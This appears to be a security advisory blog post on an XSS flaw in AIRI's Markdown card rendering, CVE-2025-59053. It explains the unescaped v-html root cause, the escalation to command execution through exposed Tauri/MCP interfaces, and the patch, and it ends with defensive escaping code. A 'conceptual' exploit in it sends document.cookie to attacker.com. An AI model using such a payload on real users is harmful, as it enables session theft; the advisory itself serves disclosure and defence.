Overview
In this post, we delve into the details of a critical vulnerability (CVE-2025-59053) that affects AIRI, a self-hosted artificial intelligence-based Grok Companion. This vulnerability exposes systems to potential compromises and data leakage, warranting immediate attention. Given AIRI’s widespread use, this vulnerability could have far-reaching implications, especially in terms of cross-site scripting (XSS) and arbitrary command execution. As such, understanding this vulnerability and its mitigation is crucial for system administrators and cybersecurity professionals alike.
Vulnerability Summary
CVE ID: CVE-2025-59053
Severity: Critical (9.6 CVSS Severity Score)
Attack Vector: Web-based
Privileges Required: None
User Interaction: Required
Impact: System compromise and potential data leakage
Affected Products
Product | Affected Versions
AIRI | v0.7.2-beta.2
How the Exploit Works
The vulnerability exists in the Markdown content processing of AIRI. Specifically, the `useMarkdown` composable processes the Markdown content, and the processed HTML is rendered directly into the DOM using v-html. An attacker can exploit this weakness by creating a card file containing malicious HTML/JavaScript.
The exploit occurs when this malicious file is processed using the `highlightTagToHtml` function, which replaces template tags without HTML escaping. The processed content is then directly rendered using v-html, leading to an XSS attack.
What makes this vulnerability more dangerous is the exposed Tauri API, which can be called from the frontend. The MCP plugin further exposes a command execution interface function, which allows arbitrary command execution and poses a severe threat to system security.
Conceptual Example Code
The following is a conceptual example of how the vulnerability might be exploited:
```javascript
const maliciousCard = `<!doctype html>
<html>
<body>
<script>
// Arbitrary JavaScript code
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>
</body>
</html>`;
// The malicious card is then processed using highlightTagToHtml and rendered using v-html
highlightTagToHtml(maliciousCard);
```
This JavaScript code would send the user’s cookies to the attacker’s server, demonstrating one of many ways this vulnerability could be exploited. The attacker could also execute arbitrary system commands if they gain access to the MCP plugin’s command execution interface.
Mitigation
Users should update to v0.7.2-beta.3 as it fixes the issue. In instances where an immediate update is not feasible, employing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can temporarily mitigate the threat by detecting and blocking malicious activity. However, this is only a temporary solution, and applying the vendor patch should be a priority.
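The root cause described above is template-tag replacement without HTML escaping, followed by rendering through v-html. The following added example (not AIRI's code and not the vendor's patch) contrasts that pattern with an escape-first version; the function names, the `{{name}}` tag syntax and the `tag` CSS class are assumptions made for illustration.

```javascript
// Added example: hypothetical helpers, not AIRI's implementation.
// Assumption: template tags look like {{name}} and are highlighted with a <span>.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape every character that can open a tag, attribute or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pattern the post describes: tags are replaced, the rest of the card text
// passes through untouched and would reach v-html as live markup.
function highlightTagsUnsafe(text) {
  return text.replace(/\{\{\s*(.*?)\s*\}\}/g, '<span class="tag">{{ $1 }}</span>');
}

// Hardened form: escape the whole untrusted string first, then add only
// the fixed markup this function controls.
function highlightTagsSafe(text) {
  return escapeHtml(text).replace(
    /\{\{\s*(.*?)\s*\}\}/g,
    (_match, name) => `<span class="tag">{{ ${name} }}</span>`,
  );
}

// True if the output contains any element other than the allowed span.
function containsForeignMarkup(html) {
  const withoutSpans = html.replace(/<\/?span( class="tag")?>/g, '');
  return /<[a-zA-Z!\/]/.test(withoutSpans);
}

// Constructed sample card field: inert markup plus one template tag.
const sampleField = 'Hello {{user}}, <em title="t">note</em> & more';

function demo() {
  return {
    unsafe: highlightTagsUnsafe(sampleField),
    safe: highlightTagsSafe(sampleField),
  };
}

const result = demo();
console.log('unsafe:', result.unsafe, '| foreign markup:', containsForeignMarkup(result.unsafe));
console.log('safe:  ', result.safe, '| foreign markup:', containsForeignMarkup(result.safe));
```

Where a field needs no markup at all, Vue's text interpolation (`{{ }}`) escapes HTML by default and avoids v-html entirely.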